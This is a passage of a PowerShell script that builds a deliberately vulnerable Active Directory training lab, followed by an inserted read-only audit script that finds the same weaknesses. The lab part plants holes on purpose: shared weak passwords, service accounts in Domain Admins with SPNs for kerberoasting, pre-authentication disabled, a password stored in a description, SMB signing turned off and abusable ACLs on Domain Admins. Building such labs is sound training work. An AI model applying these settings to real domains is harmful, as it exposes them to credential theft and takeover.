348 | dsadd user "cn=f.baker, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
349 | dsadd user "cn=g.ball, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
350 | dsadd user "cn=h.bell, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
351 | dsadd user "cn=i.brown, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
352 | dsadd user "cn=j.burton, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
353 | dsadd user "cn=k.carter, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
354 | dsadd user "cn=l.clarke, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
355 | dsadd user "cn=m.cole, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
356 | dsadd user "cn=e.griffiths, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
357 | dsadd user "cn=f.hall, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
358 | dsadd user "cn=g.hamilton, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
359 | dsadd user "cn=h.harris, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
360 | dsadd user "cn=i.harvey, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
361 | dsadd user "cn=j.hill, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
362 | dsadd user "cn=k.jackson, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
363 | dsadd user "cn=l.james, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
364 |
365 | # Head_Office / Senior_Management
366 |
367 | dsadd user "cn=k.yarrow, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
368 | dsadd user "cn=l.yates, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
369 | dsadd user "cn=m.young, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
370 | dsadd user "cn=n.zachary, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
371 | dsadd user "cn=o.zelly, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
372 | dsadd user "cn=p.zinc, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
373 | dsadd user "cn=q.zouch, ou=Senior_Management, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
374 |
375 | # IT / Help_Desk
376 |
377 | dsadd user "cn=a.adams, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
378 | dsadd user "cn=b.allen, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
379 | dsadd user "cn=c.armstrong, ou=Help_Desk, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
380 |
381 | # Admins / IT / DA
382 |
383 | dsadd user "cn=adm.adams, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
384 | dsadd user "cn=adm.smith, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
385 | dsadd user "cn=adm.stewart, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
386 | dsadd user "cn=adm.natt, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
387 | dsadd user "cn=adm.nelson, ou=Admins, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
388 |
389 | # Service Accounts / IT
390 |
391 | dsadd user "cn=svc_afds, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
392 | dsadd user "cn=svc_test, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
393 | dsadd user "cn=svc_mssql1, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
394 | dsadd user "cn=svc_mssql2, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
395 | dsadd user "cn=svc_lab, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
396 | dsadd user "cn=svc_admin, ou=Service_Accounts, ou=IT, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -memberof "CN=Domain Admins,CN=Users,dc=hacklab, dc=local"
397 |
398 | # Set up Service Principal Name (SPN) for the following accounts so you can kerberoast them.
399 |
400 | setspn -s http/server1.hacklab.local:8082 svc_afds
401 | setspn -s http/server1.hacklab.local:8083 svc_test
402 | setspn -s http/server1.hacklab.local:8084 svc_mssql1
403 | setspn -s http/server1.hacklab.local:8085 svc_mssql2
404 | setspn -s http/server1.hacklab.local:8086 svc_lab
405 | setspn -s http/server1.hacklab.local:8087 svc_admin
406 |
407 | # Make the following accounts vulnerable to asreproast.
408 |
409 | Set-ADAccountControl -Identity m.jenkins -DoesNotRequirePreAuth 1
410 | Set-ADAccountControl -Identity z.mcdonald -DoesNotRequirePreAuth 1
411 | Set-ADAccountControl -Identity u.lewis -DoesNotRequirePreAuth 1
412 |
413 | # Create a description field with a password in it.
414 |
415 | Set-ADUser d.atkinson -Description "User Password Summer123"
416 |
417 | # Disable SMB signing on the DC (Set-SmbClientConfiguration changes the SMB client settings).
418 |
419 | Set-SmbClientConfiguration -RequireSecuritySignature 0 -EnableSecuritySignature 0 -Confirm -Force
420 |
421 | # Add Domain Machines
422 |
423 | New-ADComputer -Name "SR2000-1" -SamAccountName "SR2000-1" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
424 | New-ADComputer -Name "SR2000-2" -SamAccountName "SR2000-2" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
425 | New-ADComputer -Name "SR2000-3" -SamAccountName "SR2000-3" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
426 | New-ADComputer -Name "SR2000-4" -SamAccountName "SR2000-4" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
427 | New-ADComputer -Name "SR2000-5" -SamAccountName "SR2000-5" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
428 | New-ADComputer -Name "SR2000-6" -SamAccountName "SR2000-6" -Enabled $True -OperatingSystem "Windows Server 2000 Service Pack 4"
429 | New-ADComputer -Name "SR2003-1" -SamAccountName "SR2003-1" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
430 | New-ADComputer -Name "SR2003-2" -SamAccountName "SR2003-2" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
431 | New-ADComputer -Name "SR2003-3" -SamAccountName "SR2003-3" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
432 | New-ADComputer -Name "SR2003-4" -SamAccountName "SR2003-4" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
433 | New-ADComputer -Name "SR2003-5" -SamAccountName "SR2003-5" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
434 | New-ADComputer -Name "SR2003-6" -SamAccountName "SR2003-6" -Enabled $True -OperatingSystem "Windows Server 2003 Datacenter Service Pack 2"
435 | New-ADComputer -Name "SR2008-1" -SamAccountName "SR2008-1" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
436 | New-ADComputer -Name "SR2008-2" -SamAccountName "SR2008-2" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
437 | New-ADComputer -Name "SR2008-3" -SamAccountName "SR2008-3" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
438 | New-ADComputer -Name "SR2008-4" -SamAccountName "SR2008-4" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
439 | New-ADComputer -Name "SR2008-5" -SamAccountName "SR2008-5" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
440 | New-ADComputer -Name "SR2008-6" -SamAccountName "SR2008-6" -Enabled $True -OperatingSystem "Windows Server 2008 R2 Standard Service Pack 1"
441 | New-ADComputer -Name "SR2012-1" -SamAccountName "SR2012-1" -Enabled $True -OperatingSystem "Windows Server 2012 Standard"
442 | New-ADComputer -Name "SR2012-2" -SamAccountName "SR2012-2" -Enabled $True -OperatingSystem "Windows Server 2012 Standard"
443 | New-ADComputer -Name "SR2012-3" -SamAccountName "SR2012-3" -Enabled $True -OperatingSystem "Windows Server 2012 Standard"
444 | New-ADComputer -Name "SR2012-4" -SamAccountName "SR2012-4" -Enabled $True -OperatingSystem "Windows Server 2012 Standard"
445 | New-ADComputer -Name "SR2019-1" -SamAccountName "SR2019-1" -Enabled $True -OperatingSystem "Windows Server 2019 Standard"
446 | New-ADComputer -Name "SR2019-2" -SamAccountName "SR2019-2" -Enabled $True -OperatingSystem "Windows Server 2019 Standard"
447 | New-ADComputer -Name "SR2019-3" -SamAccountName "SR2019-3" -Enabled $True -OperatingSystem "Windows Server 2019 Standard"
448 | New-ADComputer -Name "SR2019-4" -SamAccountName "SR2019-4" -Enabled $True -OperatingSystem "Windows Server 2019 Standard"
449 | New-ADComputer -Name "W7-1" -SamAccountName "W7-1" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
450 | New-ADComputer -Name "W7-2" -SamAccountName "W7-2" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
451 | New-ADComputer -Name "W7-3" -SamAccountName "W7-3" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
452 | New-ADComputer -Name "W7-4" -SamAccountName "W7-4" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
453 | New-ADComputer -Name "W7-5" -SamAccountName "W7-5" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
454 | New-ADComputer -Name "W7-6" -SamAccountName "W7-6" -Enabled $True -OperatingSystem "Windows 7 Professional Service Pack 1"
455 | New-ADComputer -Name "XP-1" -SamAccountName "XP-1" -Enabled $True -OperatingSystem "Windows XP Service Pack 1"
456 |
457 | # Set up ACLs
458 |
459 | Import-Module ActiveDirectory
460 | Set-Location AD:
461 |
462 | Function SetAcl($for, $to, $right, $inheritance)
463 | {
464 | $forSID = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser $for).SID
465 | $objOU = ($to).DistinguishedName
466 | $objAcl = get-acl $objOU
467 | # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0
468 | $adRight = [System.DirectoryServices.ActiveDirectoryRights] $right # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0
469 | $type = [System.Security.AccessControl.AccessControlType] "Allow" # https://docs.microsoft.com/fr-fr/dotnet/api/system.security.accesscontrol.accesscontroltype?view=dotnet-plat-ext-5.0
470 | $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] $inheritance # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=dotnet-plat-ext-5.0
471 | $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $forSID,$adRight,$type,$inheritanceType
472 | $objAcl.AddAccessRule($ace)
473 | Set-Acl -AclObject $objAcl -path $objOU
474 | }
475 |
476 |
477 | Function SetAclExtended($for, $to, $right, $extendedRightGUID, $inheritance)
478 | {
479 | $forSID = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser $for).SID
480 | $objOU = ($to).DistinguishedName
481 | $objAcl = get-acl $objOU
482 | # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0
483 | $adRight = [System.DirectoryServices.ActiveDirectoryRights] $right # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-5.0
484 | $type = [System.Security.AccessControl.AccessControlType] "Allow" # https://docs.microsoft.com/fr-fr/dotnet/api/system.security.accesscontrol.accesscontroltype?view=dotnet-plat-ext-5.0
485 | $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] $inheritance # https://docs.microsoft.com/fr-fr/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=dotnet-plat-ext-5.0
486 |
487 | $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $forSID,$adRight,$type,$extendedRightGUID,$inheritanceType
488 | $objAcl.AddAccessRule($ace)
489 | Set-Acl -AclObject $objAcl -path $objOU
490 | }
491 |
492 | ## acl values :
493 | # AccessSystemSecurity
494 | # CreateChild
495 | # Delete
496 | # DeleteChild
497 | # DeleteTree
498 | # ExtendedRight
499 | # GenericAll
500 | # GenericExecute
501 | # GenericRead
502 | # GenericWrite
503 | # ListChildren
504 | # ListObject
505 | # ReadControl
506 | # ReadProperty
507 | # Self
508 | # Synchronize
509 | # WriteDacl
510 | # WriteOwner
511 | # WriteProperty
512 |
513 | ## extended rights
514 | # "00299570-246d-11d0-a768-00aa006e0529" {$right = "User-Force-Change-Password"}
515 | # "45ec5156-db7e-47bb-b53f-dbeb2d03c40f" {$right = "Reanimate-Tombstones"}
516 | # "bf9679c0-0de6-11d0-a285-00aa003049e2" {$right = "Self-Membership"}
517 | # "ba33815a-4f93-4c76-87f3-57574bff8109" {$right = "Migrate-SID-History"}
518 | # "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" {$right = "DS-Replication-Get-Changes-All"}
519 |
520 | # ACL abuse scenarios
521 | # https://sensepost.com/blog/2020/ace-to-rce/
522 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
523 | # https://adsecurity.org/?p=3658
524 |
525 |
526 | # genericall-on-user
527 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-user
528 |
529 | SetAcl (Get-ADUser "n.collins") (Get-ADUser "a.adams") "GenericAll" "None"
530 |
531 | # genericall-on-group
532 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-group
533 |
534 | SetAcl (Get-ADUser "o.davidson") (Get-ADGroup "Domain Admins") "GenericAll" "None"
535 |
536 | # genericall-genericwrite-write-on-computer
537 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-genericwrite-write-on-computer
538 |
539 | SetAcl (Get-ADUser "g.white") (Get-ADComputer "W7-4$") "WriteProperty" "All"
540 |
541 | # writeproperty-on-group
542 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeproperty-on-group
543 |
544 | SetAcl (Get-ADUser "q.kennedy") (Get-ADGroup "Domain Admins") "WriteProperty" "All"
545 |
546 | # self-self-membership-on-group
547 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#self-self-membership-on-group
548 |
549 | SetAclExtended (Get-ADUser "u.roberts") (Get-ADGroup "Domain Admins") "Self" "bf9679c0-0de6-11d0-a285-00aa003049e2" "None"
550 |
551 | # writeproperty-self-membership
552 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeproperty-self-membership
553 |
554 | SetAclExtended (Get-ADUser "f.west") (Get-ADGroup "Domain Admins") "WriteProperty" "bf9679c0-0de6-11d0-a285-00aa003049e2" "All"
555 |
556 | # forcechangepassword
557 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#forcechangepassword
558 | # https://docs.microsoft.com/fr-fr/windows/win32/adschema/r-user-change-password
559 |
560 | SetAclExtended (Get-ADUser "l.james") (Get-ADUser "y.fox") "ExtendedRight" "00299570-246d-11d0-a768-00aa006e0529" "None"
561 |
562 | # write owner on group
563 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writeowner-on-group
564 |
565 | SetAcl (Get-ADUser "a.graham") (Get-ADGroup "Domain Admins") "WriteOwner" "None"
566 |
567 | # genericwrite-on-user
568 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericwrite-on-user
569 |
570 | SetAcl (Get-ADUser "c.nelson") (Get-ADUser "w.marshall") "GenericWrite" "None"
571 |
572 | # writedacl-writeowner
573 | # https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#writedacl-writeowner
574 |
575 | SetAcl (Get-ADUser "p.kelly") (Get-ADGroup "RDP") "WriteDacl" "None"
576 |
577 | exit
578 | ```
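
The following is an added example, not part of the lab repository: a read-only PowerShell audit that lists the weaknesses the script above plants (SPNs on user accounts, disabled pre-authentication, passwords in descriptions, delegated write rights, SMB signing state). The `$trusted` allow list, the `$targets` selection and the `Get-RiskyAce` helper name are assumptions to adapt to your own domain.

```powershell
# Added example, not the lab author's code. Needs the ActiveDirectory module (RSAT)
# and read access to the domain. It reads only and changes nothing.
Import-Module ActiveDirectory

$daDn = (Get-ADGroup 'Domain Admins').DistinguishedName

# 1. User accounts that carry an SPN; flag direct Domain Admins members.
$spnUsers = Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
        -Properties ServicePrincipalName, MemberOf, PasswordLastSet |
    Where-Object { $_.SamAccountName -ne 'krbtgt' } |
    Select-Object SamAccountName, PasswordLastSet,
        @{ n = 'DomainAdmin'; e = { $_.MemberOf -contains $daDn } },
        @{ n = 'SPN'; e = { $_.ServicePrincipalName -join ';' } }

# 2. Accounts with Kerberos pre-authentication disabled.
$noPreAuth = Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' |
    Select-Object SamAccountName, Enabled

# 3. Descriptions that look like they hold a credential.
$descHits = Get-ADUser -Filter 'Description -like "*pass*" -or Description -like "*pwd*"' `
        -Properties Description |
    Select-Object SamAccountName, Description

# 4. Explicit Allow ACEs with write-type rights held by principals outside an
#    allow list. The list is an assumption: tune it to your delegation model.
$trusted = 'Domain Admins|Enterprise Admins|Administrators|SYSTEM|SELF|Everyone|' +
           'ENTERPRISE DOMAIN CONTROLLERS|Account Operators|Cert Publishers|' +
           'Terminal Server License Servers'
# GenericAll and GenericWrite include these bits, so the mask catches them too.
$writeMask = [int][System.DirectoryServices.ActiveDirectoryRights]'WriteProperty, Self, ExtendedRight, WriteDacl, WriteOwner'

function Get-RiskyAce {
    param([Parameter(Mandatory)] $AdObject)
    (Get-Acl -Path "AD:\$($AdObject.DistinguishedName)").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and -not $_.IsInherited -and
            (([int]$_.ActiveDirectoryRights -band $writeMask) -ne 0) -and
            $_.IdentityReference.Value -notmatch $trusted
        } |
        Select-Object @{ n = 'Target'; e = { $AdObject.Name } },
            IdentityReference, ActiveDirectoryRights, ObjectType
}

# Objects the lab script delegates rights on; extend to whole OUs as needed.
$targets = @(
    Get-ADGroup 'Domain Admins'; Get-ADGroup 'RDP'
    Get-ADUser 'a.adams'; Get-ADUser 'y.fox'; Get-ADUser 'w.marshall'
)
$riskyAces = $targets | ForEach-Object { Get-RiskyAce $_ }

# 5. SMB signing on the host this runs on (client and server side).
$smb = [pscustomobject]@{
    ClientRequireSigning = (Get-SmbClientConfiguration).RequireSecuritySignature
    ServerRequireSigning = (Get-SmbServerConfiguration).RequireSecuritySignature
}

$spnUsers  | Format-Table -AutoSize
$noPreAuth | Format-Table -AutoSize
$descHits  | Format-Table -AutoSize
$riskyAces | Format-Table -AutoSize
$smb       | Format-List
```

The ACL check skips inherited ACEs, so rights delegated at an OU or the domain root need a separate pass over those containers.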
579 |
580 |
581 |
--------------------------------------------------------------------------------